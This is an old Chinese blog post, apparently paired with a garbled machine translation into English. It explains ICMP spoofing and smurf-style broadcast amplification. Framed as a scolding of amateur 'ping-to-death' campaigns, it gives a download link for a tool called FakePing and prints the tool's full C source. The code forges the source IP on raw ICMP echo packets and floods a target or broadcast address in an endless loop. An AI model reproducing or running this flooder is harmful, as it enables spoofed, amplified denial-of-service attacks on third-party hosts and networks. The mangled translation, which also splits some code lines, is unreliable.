最近不少人又来号召大家一起去Ping死什么什么网站,政治我不懂,不过从技术上来说,无论什么拒绝服务攻击方式,都需要满足一个条件:用最少的资源换取被攻击者最大的消耗。 Recently, many people came together to call us what Ping dead what site I do not understand politics, but technically speaking, no matter what the denial of service attacks, we need to satisfy a condition: with the least resources in exchange for being the largest attacker consumption. 像这样大家一起去Ping不仅是奇怪的:用最大的资源换取对方最小的伤害;也是可笑的:人民战争大概属于50多年前的行为了,在互联网时代,并不是人多就能如何如何的。 We like to go with Ping is not only strange: with the greatest resources for each other the least harm; is ridiculous: people's war 50 years ago, probably belonging to act, and in the Internet age, not how many people will be able to.
一个基本的认识:互联网的中心在美国,中国的这一部分只不过是互联网的一个小小分支(也就是相当于美国的一个城域网的概念),我们通往北美的光缆称为“北美出口”,出口什么意思? A basic understanding of: the center of the Internet in the United States, China, this part of the Internet is just a small branch (that is equivalent to the U.S. concept of a metropolitan area network), our leading North American cable called the "North American export "What do you mean export? 大门呀,换句话说,也就是瓶颈,这样大家Ping来Ping去,首先死的是中国的出口网关(中国的北美出口带宽也不过是GB级的,很宽么?经得住大家一起往外挤么?),当然,北美出口歇掉了,我们显然是看不见美国网站了,喜欢做阿Q的不妨对自己和别人说:“美国被我们炸掉了!”(奇怪吧?可是前些时候不是有自己炮制白宫“被黑”页面到处散发的?)可是这样不如我们关掉国门、断开互联网,自己在家里做强国梦好了,想象中我们仍然是在强大的唐朝,世界各地都来朝拜。 The door Yeah, in other words, that is the bottleneck, so we go to Ping to Ping, the first death is the gateway of China's exports (exports to China, North America, but GB bandwidth level, a very wide it? Can stand out with everyone squeeze it?), of course, the North American exports break out, we clearly see the U.S. site, and Ah Q's might like to do on their own and others, said: "We are blown up by the United States!" (strange, right? But before some The White House has its own processing time is not "being black" distributed around the page?), but such as we turn off the door, disconnect from the Internet, their own power at home to do a good dream, imagine, we are still in the powerful Tang dynasty, around the world have come to worship.
闲话少说,我们今天是来说Ping的,Ping是通过发送ICMP报文(类型8代码0)探寻网络主机是否存在的一个工具,很久以前,一部分操作系统(例如 win95),不能很好处理过大的Ping包,导致出现了Ping to Death的攻击方式(用大Ping包搞垮对方或者塞满网络),随着操作系统的升级,网络带宽的升级、计算机硬件的升级,目前,大Ping包基本上没有很大的攻击效果(分布式攻击除外),如果一定要使用Ping包去攻击别的主机,除非是利用TCP/IP协议的其他特性或者网络拓扑结构的缺陷放大攻击的力度(所谓正反馈) Without further ado, today we are for the Ping, Ping is by sending ICMP packet (type 8 code 0) to explore whether there is a network tool for the host, a long time ago, part of the operating system (eg win95), are not well treated large Ping packets, resulting in a Ping to Death of attacks (Ping bag with a large ruin or filled with other networks), with the operating system upgrade, the upgrade of network bandwidth, computer hardware upgrade, at present, a large Ping packets Basically, the effect is not that great attack (except for distributed attack), if we must use the Ping packets to attack other hosts, except the use of TCP / IP protocol or other characteristics of the network topology defects enlarge the intensity of attack (the so-called positive feedback)
正常情况下,Ping的流程是这样的: Under normal circumstances, Ping process is like this:
主机A发送ICMP 8,0报文给主机B Host A sends ICMP 8,0 packet to host B
主机B回送ICMp 0,0报文给主机A Host B loopback packets to the host ICMp 0,0 A
因为ICMP基于无连结,所以就给了我们可乘之机,假设现在主机A伪装成主机C发送ICMP 8,0报文,结果会怎么样呢?显然,主机B会以为是主机C发送的报文而去 No link because ICMP is based, so give us an opportunity, assuming that now masquerade as the host C host A sends ICMP 8,0 packet, the results of what will happen? Obviously, that is to host B Host C will send the report text away
回应主机C,结构如下: Response to host C, as follows:
伪装为主机C 错误的回复 C error masquerading as the host response
主机A--------------------->主机B------------------>主机C Host A ---------------------> Host B ------------------> Host C
这种情况下,由于主机A只需要不断发送Ping报文而不需要处理返回的EchoReply,所以攻击力度成倍的增加,同时实际上主机B和主机C都是被进攻的目标,而且 In this case, because only host A send Ping packets continuously without the need to process the returned EchoReply, so the intensity of the attacks increase exponentially, while in fact the host B and host C are to be the object of attack, and
不会留下自己的痕迹,是一种隐蔽的一石二鸟的攻击方法。 Do not leave their mark, is a covert attack to kill two birds with one stone approach.
上面的方法用SOCK_RAW伪装IP就可以轻松实现,不过即使放大了两倍,对于比较强壮的操作系统和较大的带宽,也不见得有多大的效果,难道我们又来组织运动? The above method with SOCK_RAW camouflage IP can be easily achieved, but even enlarged twice, for the more robust operating system and the larger the bandwidth, it would not have much effect, should we again organized sports? 不好吧,还是让敌人给我们放大好了,TCP/IP中有一个概念叫做广播,所谓广播的意思是说有一个地址,任何局域网内的主机都会接收发往这个地址的报文(就像电台广播一样),要是? Not right, let us enlarge the enemy better, TCP / IP has a concept called the radio, the so-called broadcasting means that there is an address, any host on the LAN will be sent to this address to receive messages (as radio), if? 难道? Is it? 没错! Yes! 如果我们往广播地址发送一个ICMP ECHO报文(就是Ping广播地址一下),结果会得到非常多的回应,以太网内每一个允许接收广播报文的主机都会回应一个ICMP_ECHOREPLY,如果你想试验,可以在unix的机器上Ping一下你局域网的广播地址,会看到很多回应的的dup包,就是重复的应答,windows系统上不会有这样的结果,因为微软的Ping程序不对多个回应进行解包,收到第一个包以后就丢弃后面的了,同样微软的系统默认也不回应广播地址的包,所以你最好在一个大量 unix主机的局域网内测试。 If we are to a broadcast address to send ICMP ECHO packet (that is Ping the broadcast address it), the result will be a lot of response, Ethernet allows each host to receive broadcast packets will respond to a ICMP_ECHOREPLY, if you want to test, unix machines in your LAN Ping the broadcast address, you will see a lot of dup packet response is to repeat the answer, windows system will not have this result, because the Microsoft Ping program does not respond to a number solutions package, receives the first packet after it has dropped back, the same does not respond to Microsoft's default broadcast address of the packet, so you better in a lot of unix host LAN test.
说到这里,聪明的你肯定知道我想干什么了吧? Here, smart you know for sure I want to do, right? 嘿嘿嘿嘿,没错,当我们伪装成被攻击主机向一个广播地址发送Ping请求的时候,所有这个广播地址内的主机都会回应这个Ping请求(当然是回应给被攻击主机啦,人人都以为是它Ping的呢),这样,相当于是N倍的攻击力度! Hey Hey, that's right, when we were attacked disguised as host to a broadcast address to send Ping request, all the broadcast address of the host will respond to the Ping request (of course, is the host response to attack you, everyone thought it was Ping's do it), this is equivalent to N times the intensity of the attacks! (N=广播地址内回应Ping包的主机数量) (N = broadcast address of the host response to the number of Ping packets)
我写了一个FakePing的工具,可以在Http://www.patching.net/shotgun/FakePing.exe下载,使用方法是FakePing.exe FakeIP TargetIP FakePing I wrote a tool that can be Http: / / www.patching.net / shotgun / FakePing.exe download, use is FakePing.exe FakeIP TargetIP
[PacketSize],如果TargetIP是广播地址,那么FakeIP是被攻击目标. [PacketSize], if TargetIP is the broadcast address, then FakeIP is being targeted.
源码公布如下:(写的比较匆忙,代码比较乱,见笑了) Source announced as follows: (written in a hurry, the code was chaotic, laughed)
////////////////////////////////////////////////////////////////////////// ////////////////////////////////////////////////// ////////////////////////
// // / / / /
// FakePing For Win2K by Shotgun // / / FakePing For Win2K by Shotgun / /
// // / / / /
// Released: [2001.4] // / / Released: [2001.4] / /
// Author: [Shotgun] // / / Author: [Shotgun] / /
// Homepage: // / / Homepage: / /
// [http://IT.Xici.Net] // / / [Http://IT.Xici.Net] / /
// [http://WWW.Patching.Net] // / / [Http://WWW.Patching.Net] / /
// // / / / /
////////////////////////////////////////////////////////////////////////// ////////////////////////////////////////////////// ////////////////////////
#include
#include
#include
#include
#define SEQ 0x28376839 # Define SEQ 0x28376839
#define STATUS_FAILED 0xFFFF //错误返回值 # Define STATUS_FAILED 0xFFFF / / error return value
typedef struct _iphdr //定义IP首部 typedef struct _iphdr / / define the IP header
{ {
unsigned char h_verlen; //4位首部长度,4位IP版本号 unsigned char h_verlen; / / 4 位 header length, IP version 4
unsigned char tos; //8位服务类型TOS unsigned char tos; / / 8 位 TOS type of service
unsigned short total_len; //16位总长度(字节) unsigned short total_len; / / 16 median overall length (in bytes)
unsigned short ident; //16位标识 unsigned short ident; / / 16-bit identifier
unsigned short frag_and_flags; //3位标志位 unsigned short frag_and_flags; / / 3 flag
unsigned char ttl; //8位生存时间TTL unsigned char ttl; / / 8 median survival time of TTL
unsigned char proto; //8位协议(TCP, UDP 或其他) unsigned char proto; / / 8-bit protocol (TCP, UDP or other)
unsigned short checksum; //16位IP首部校验和 unsigned short checksum; / / 16 bit IP header checksum
unsigned int sourceIP; //32位源IP地址 unsigned int sourceIP; / / 32 bit source IP address
unsigned int destIP; //32位目的IP地址 unsigned int destIP; / / 32-bit destination IP address
}IP_HEADER; } IP_HEADER;
// / /
// 定义ICMP首部 / / Define the ICMP header
typedef struct _ihdr typedef struct _ihdr
{ {
BYTE i_type; //8位类型 BYTE i_type; / / 8-bit type
BYTE i_code; //8位代码 BYTE i_code; / / 8-bit code
USHORT i_cksum; //16位校验和 USHORT i_cksum; / / 16 bit checksum
USHORT i_id; //识别号(一般用进程号作为识别号) USHORT i_id; / / identification number (usually with a process ID as identification number)
USHORT i_seq; //报文序列号 USHORT i_seq; / / packet sequence number
ULONG timestamp; //时间戳 ULONG timestamp; / / time stamp
}ICMP_HEADER; } ICMP_HEADER;
//CheckSum:计算校验和的子函数 / / CheckSum: a checksum calculation subroutine
USHORT checksum(USHORT *buffer, int size) USHORT checksum (USHORT * buffer, int size)
{ {
unsigned long cksum=0; unsigned long cksum = 0;
while(size >1) { while (size> 1) {
cksum+=*buffer++; cksum + =* buffer + +;
size -=sizeof(USHORT); size -= sizeof (USHORT);
} }
if(size ) { if (size) {
cksum += *(UCHAR*)buffer; cksum + = * (UCHAR *) buffer;
} }
cksum = (cksum >> 16) + (cksum & 0xffff); cksum = (cksum>> 16) + (cksum & 0xffff);
cksum += (cksum >>16); cksum + = (cksum>> 16);
return (USHORT)(~cksum); return (USHORT) (~ cksum);
} }
//FakePing主函数 / / FakePing main function
int main(int argc, char **argv) int main (int argc, char ** argv)
{ {
int datasize,ErrorCode,counter,flag; int datasize, ErrorCode, counter, flag;
int TimeOut=2000, SendSEQ=0, PacketSize=32; int TimeOut = 2000, SendSEQ = 0, PacketSize = 32;
char SendBuf[65535]={0}; char SendBuf [65535] = {0};
WSADATA wsaData; WSADATA wsaData;
SOCKET SockRaw=(SOCKET)NULL; SOCKET SockRaw = (SOCKET) NULL;
struct sockaddr_in DestAddr; struct sockaddr_in DestAddr;
IP_HEADER ip_header; IP_HEADER ip_header;
ICMP_HEADER icmp_header; ICMP_HEADER icmp_header;
char FakeSourceIp[20],DestIp[20]; char FakeSourceIp [20], DestIp [20];
//接受命令行参数 / / Accept command line parameters
if (argc<3) if (argc <3) { { printf(\"FakePing by Shotgun\\n\"); printf (\ "FakePing by Shotgun \ \ n \"); printf(\"\\tThis program can do Ping-Flooding from a FakeIP\\n\"); printf (\ "\ \ tThis program can do Ping-Flooding from a FakeIP \ \ n \"); printf(\"\\tUsing a BroadCast IP as the FakeIP will enhance the effect\\n\"); printf (\ "\ \ tUsing a BroadCast IP as the FakeIP will enhance the effect \ \ n \"); printf(\"Email:\\n\"); printf (\ "Email: \ \ n \"); printf(\"\\tShotgun@Xici.Net\\n\"); printf (\ "\ \ tShotgun@Xici.Net \ \ n \"); printf(\"HomePage:\\n\"); printf (\ "HomePage: \ \ n \"); printf(\"\\thttp://It.Xici.Net\\n\"); printf (\ "\ \ thttp: / / It.Xici.Net \ \ n \"); printf(\"\\thttp://www.Patching.Net\\n\"); printf (\ "\ \ thttp: / / www.Patching.Net \ \ n \"); printf(\"USAGE:\\n\\tFakePing.exe FakeSourceIp DestinationIp [PacketSize]\\n\"); printf (\ "USAGE: \ \ n \ \ tFakePing.exe FakeSourceIp DestinationIp [PacketSize] \ \ n \"); printf(\"Example:\\n\"); printf (\ "Example: \ \ n \"); printf(\"\\tFakePing.exe 192.168.15.23 192.168.15.255\\n\"); printf (\ "\ \ tFakePing.exe 192.168.15.23 192.168.15.255 \ \ n \"); printf(\"\\tFakePing.exe 192.168.15.23 192.168.15.200 6400\\n\"); printf (\ "\ \ tFakePing.exe 192.168.15.23 192.168.15.200 6400 \ \ n \"); exit(0); exit (0); } } strcpy(FakeSourceIp,argv[1]); strcpy (FakeSourceIp, argv [1]); strcpy(DestIp,argv[2]); strcpy (DestIp, argv [2]); if (argc>3) PacketSize=atoi(argv[3]); if (argc> 3) PacketSize = atoi (argv [3]);
if (PacketSize>60000) if (PacketSize> 60000)
{ {
printf(\"Error! Packet size too big, must <60K\\n\"); printf (\ "Error! Packet size too big, must <60K \ \ n \");
exit(0); exit (0);
} }
printf(\"Now Fake %s Ping %s using Packet size=%d bytes\\n\", printf (\ "Now Fake% s Ping% s using Packet size =% d bytes \ \ n \",
FakeSourceIp, DestIp, PacketSize); FakeSourceIp, DestIp, PacketSize);
printf(\"\\tCtrl+C to Quit\\n\"); printf (\ "\ \ tCtrl + C to Quit \ \ n \");
//初始化SOCK_RAW / / Initialize SOCK_RAW
if((ErrorCode=WSAStartup(MAKEWORD(2,1),&wsaData))!=0) if ((ErrorCode = WSAStartup (MAKEWORD (2,1), & wsaData))! = 0)
{ {
fprintf(stderr,\"WSAStartup failed: %d\\n\",ErrorCode); fprintf (stderr, \ "WSAStartup failed:% d \ \ n \", ErrorCode);
ExitProcess(STATUS_FAILED); ExitProcess (STATUS_FAILED);
} }
if((SockRaw=WSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,WSA_FLAG_OVERLAPPED))==INVALID_SOCKET) if ((SockRaw = WSASocket (AF_INET, SOCK_RAW, IPPROTO_RAW, NULL, 0, WSA_FLAG_OVERLAPPED)) == INVALID_SOCKET)
{ {
fprintf(stderr,\"WSASocket() failed: %d\\n\",WSAGetLastError()); fprintf (stderr, \ "WSASocket () failed:% d \ \ n \", WSAGetLastError ());
ExitProcess(STATUS_FAILED); ExitProcess (STATUS_FAILED);
} }
flag=TRUE; flag = TRUE;
//设置IP_HDRINCL以自己填充IP首部 / / Set IP_HDRINCL fill in their own IP header
ErrorCode=setsockopt(SockRaw,IPPROTO_IP,IP_HDRINCL,(char *)&flag,sizeof(int)); ErrorCode = setsockopt (SockRaw, IPPROTO_IP, IP_HDRINCL, (char *) & flag, sizeof (int));
if(ErrorCode==SOCKET_ERROR) if (ErrorCode == SOCKET_ERROR)
printf(\"Set IP_HDRINCL Error!\\n\"); printf (\ "Set IP_HDRINCL Error! \ \ n \");
__try{ __try {
//设置发送超时 / / Set to send out
ErrorCode=setsockopt(SockRaw,SOL_SOCKET,SO_SNDTIMEO,(char*)&TimeOut,sizeof(TimeOut)); ErrorCode = setsockopt (SockRaw, SOL_SOCKET, SO_SNDTIMEO, (char *) & TimeOut, sizeof (TimeOut));
if (ErrorCode==SOCKET_ERROR) if (ErrorCode == SOCKET_ERROR)
{ {
fprintf(stderr,\"Failed to set send TimeOut: %d\\n\",WSAGetLastError()); fprintf (stderr, \ "Failed to set send TimeOut:% d \ \ n \", WSAGetLastError ());
__leave; __leave;
} }
memset(&DestAddr,0,sizeof(DestAddr)); memset (& DestAddr, 0, sizeof (DestAddr));
DestAddr.sin_family=AF_INET; DestAddr.sin_family = AF_INET;
DestAddr.sin_addr.s_addr=inet_addr(DestIp); DestAddr.sin_addr.s_addr = inet_addr (DestIp);
//填充IP首部 / / Fill the IP header
ip_header.h_verlen=(4<<4 | sizeof(ip_header)/sizeof(unsigned long)); //高四位IP版本号,低四位首部长度 ip_header.h_verlen = (4 <<4 | sizeof (ip_header) / sizeof (unsigned long)); / / high four IP version number, the first minister of the low degree of four
ip_header.total_len=htons(sizeof(IP_HEADER)+sizeof(ICMP_HEADER)); //16位总长度(字节) ip_header.total_len = htons (sizeof (IP_HEADER) + sizeof (ICMP_HEADER)); / / 16 median overall length (in bytes)
ip_header.ident=1; ip_header.ident = 1;
//16位标识 / / 16-bit identifier
ip_header.frag_and_flags=0; ip_header.frag_and_flags = 0;
//3位标志位 / / 3 flag
ip_header.ttl=128; ip_header.ttl = 128;
//8位生存时间TTL / / 8-bit TTL time to live
ip_header.proto=IPPROTO_ICMP; ip_header.proto = IPPROTO_ICMP;
//8位协议(TCP, UDP 或其他) / / 8-bit protocol (TCP, UDP or other)
ip_header.checksum=0; ip_header.checksum = 0;
//16位IP首部校验和 / / 16-bit IP header checksum
ip_header.sourceIP=inet_addr(FakeSourceIp); //32 ip_header.sourceIP = inet_addr (FakeSourceIp); / / 32
位源IP地址 Bit source IP address
ip_header.destIP=inet_addr(DestIp); ip_header.destIP = inet_addr (DestIp);
//32位目的IP地址 / / 32-bit destination IP address
//填充ICMP首部 / / Fill the ICMP header
icmp_header.i_type = 8; icmp_header.i_type = 8;
icmp_header.i_code = 0; icmp_header.i_code = 0;
icmp_header.i_cksum = 0; icmp_header.i_cksum = 0;
icmp_header.i_id = 2; icmp_header.i_id = 2;
icmp_header.timestamp = 999; icmp_header.timestamp = 999;
icmp_header.i_seq=999; icmp_header.i_seq = 999;
memcpy(SendBuf, &icmp_header, sizeof(icmp_header)); memcpy (SendBuf, & icmp_header, sizeof (icmp_header));
memset(SendBuf+sizeof(icmp_header), 'E', PacketSize); memset (SendBuf + sizeof (icmp_header), 'E', PacketSize);
icmp_header.i_cksum = checksum((USHORT *)SendBuf, sizeof(icmp_header)+PacketSize); icmp_header.i_cksum = checksum ((USHORT *) SendBuf, sizeof (icmp_header) + PacketSize);
memcpy(SendBuf,&ip_header,sizeof(ip_header)); memcpy (SendBuf, & ip_header, sizeof (ip_header));
memcpy(SendBuf+sizeof(ip_header), &icmp_header, sizeof(icmp_header)); memcpy (SendBuf + sizeof (ip_header), & icmp_header, sizeof (icmp_header));
memset(SendBuf+sizeof(ip_header)+sizeof(icmp_header), 'E', PacketSize); memset (SendBuf + sizeof (ip_header) + sizeof (icmp_header), 'E', PacketSize);
memset(SendBuf+sizeof(ip_header)+sizeof(icmp_header)+PacketSize, 0, 1); memset (SendBuf + sizeof (ip_header) + sizeof (icmp_header) + PacketSize, 0, 1);
//计算发送缓冲区的大小 / / Send buffer size calculation
datasize=sizeof(ip_header)+sizeof(icmp_header)+PacketSize; datasize = sizeof (ip_header) + sizeof (icmp_header) + PacketSize;
ip_header.checksum=checksum((USHORT *)SendBuf,datasize); ip_header.checksum = checksum ((USHORT *) SendBuf, datasize);
//填充发送缓冲区 / / Fill the transmit buffer
memcpy(SendBuf,&ip_header, sizeof(ip_header)); memcpy (SendBuf, & ip_header, sizeof (ip_header));
while(1) while (1)
{ {
Sleep(100); Sleep (100);
printf(\".\"); printf (\ ". \");
for(counter=0;counter<1024;counter++) for (counter = 0; counter <1024; counter + +)
{ {
//发送ICMP报文 / / Send ICMP packets
ErrorCode=sendto(SockRaw,SendBuf,datasize,0,(struct sockaddr*)&DestAddr,sizeof(DestAddr)); ErrorCode = sendto (SockRaw, SendBuf, datasize, 0, (struct sockaddr *) & DestAddr, sizeof (DestAddr));
if (ErrorCode==SOCKET_ERROR) printf(\"\\nSend Error:%d\\n\",GetLastError()); if (ErrorCode == SOCKET_ERROR) printf (\ "\ \ nSend Error:% d \ \ n \", GetLastError ());
} }
} }
}//End of try } / / End of try
__finally { __finally {
if (SockRaw != INVALID_SOCKET) closesocket(SockRaw); if (SockRaw! = INVALID_SOCKET) closesocket (SockRaw);
WSACleanup(); WSACleanup ();
} }
return 0; return 0;
} }
结语: Conclusion:
爱国主义是必要的,热情是不可少的,但是技术这个东西来不得半点虚假,来不得半点冲动,是要靠老老实实慢慢钻研的,FakePing技术在互联网上不是什么新技术,很久以前被我们唾弃攻击的美国人就实现过了,难道我们现在还要去组织多少万人去冲击互联网出口? Patriotism is necessary, enthusiasm is essential, but technology does not allow this thing false and does not allow impulse is to rely on honest study of slowly, FakePing technology on the Internet is not a new technology was a long time ago We cast aside the attack Americans realized, wondering how much we now have to organize people to the impact of the Internet export? 依靠智慧和知识的阿基米德,曾经用镜子保护了自己的家园,难道我们现在还要靠冲动和盲目去强国富民么? Rely on the wisdom and knowledge of Archimedes, who used a mirror to protect their homes, do we still rely on impulse and blind to the strength and prosperity it? (中华补天) (China Sky)
Tidak ada komentar:
Posting Komentar